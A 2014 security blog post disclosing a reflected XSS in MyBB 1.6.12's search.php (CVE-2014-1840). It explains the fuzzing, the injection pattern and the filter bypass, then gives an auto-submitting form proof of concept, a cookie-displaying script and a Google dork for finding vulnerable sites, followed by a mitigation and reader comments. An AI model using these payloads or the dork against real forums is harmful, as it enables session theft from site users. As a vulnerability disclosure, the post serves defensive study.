MyBB 1.6.12 POST XSS 0day

This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given.

alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws out a SQL error:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'
AND (  LOWER(t.subject) LIKE '%&lt;foo&gt; &lt;h1&gt; &lt;script&gt; alert (bar) () ; //%'  LOWER(t.subject)
LIKE '%&gt; &lt; prompt \x41 \%42 constructor onload%')


This made me analyze and reverse this to find the cause. After filtering out this was the correct input which can cause this error.

This part should be constant or'(“\

To reproduce this issue you can add any char value in front on or'(“\  and 2 char values after or'(“\  and you cannot have any spaces in between them.

This will be the skeleton:

[1 char value]or'(“\[2 char values]




You can have a space like this

qor'(“\ a

SELECT t.tid, t.firstpost
FROM mybb_threads t
AND t.closed NOT LIKE 'moved|%'  AND (  LOWER(t.subject)
LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')


How to Inject JavaScript and HTML?

We can inject HTML + JavaScript but the search.php filters out ‘ “ [] – characters. This is the method you could use inject your payload. If we put our constant in the middle we can inject our payload in front and after it. If we inject it at the beginning of the constant the payload will be stored in this manner.

<Payload here>qor'(“\2a

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')

For example if we inject a HTML header at the beginning


It will look like this inside the source:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%<h1>Osanda</h1>>qor (%'  LOWER(t.subject) LIKE '%\2a%')


Now if we try injecting at the end of our payload it will be stored in two places like this in the source.


The payload is thrown out in the SQL error itself.

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 
'LOWER(t.subject) LIKE '%\2a%')' at line 3

The second place is inside the query.

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1        
AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')



This would be an example of JavaScript being interpreted alert(/Osanda/). Notice that our string is converted to lower case characters due to the SQL query.


Remember this filters out ‘ “ [] — characters. Therefore we can use and external script source for performing further client side attacks.

Proof of Concept

Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: Februrary 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
E-Mail: osandajayathissa[at]
Vendor Homepage:
Software Link:
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Original write-up:
CVE: CVE-2014-1840
    <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
      <input type="hidden" name="action" value="do_search" />
      <input type="hidden" name="keywords" value="qor&apos;(&quot;\2a&lt;script&gt;alert(/XSS/)&lt;/script&gt; " />
    <script>document.exploit.submit(); </script>

POC Video

You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this.


This will be containing in the poc file.

document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/>
<h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie);
alert('XSS by Osanda & HR');

external XSS

Thanks to Hood3dRob1n for this idea 🙂

I have no idea to inject SQL in this bug. You may give it a try and see.



To protect from this you can disable the “Standard” searching and enable “Full Text” option in the Admin CP.
Steps to do this.

  • Login to the Admin CP
  • Click Configuration -> Search Settings
  • Choose “Full Text” as the Search type and click Save Setting

Thanks to Cake for reminding me this.




20 thoughts on “MyBB 1.6.12 POST XSS 0day

  1. Pretty nice post. I just stumbled upon your weblog and wished to say that I have truly enjoyed browsing your
    blog posts. After all I will be subscribing to your rss
    feed and I hope you write again very soon!

  2. Exceptional post however I was wondering if you could write a litte more on this topic?

    I’d be very grateful if you could elaborate a little bit further.

  3. Hi, I do think this is an excellent site. I stumbledupon it 😉 I’m going to revisit once
    again since i have book-marked it. Money and freedom is the best way to change, may you be rich and continue to help others.

  4. @Osanda
    Did you attempt Responsible Disclosure first? Why Full Disclosure?

Leave a Reply to Osanda Malith Cancel reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.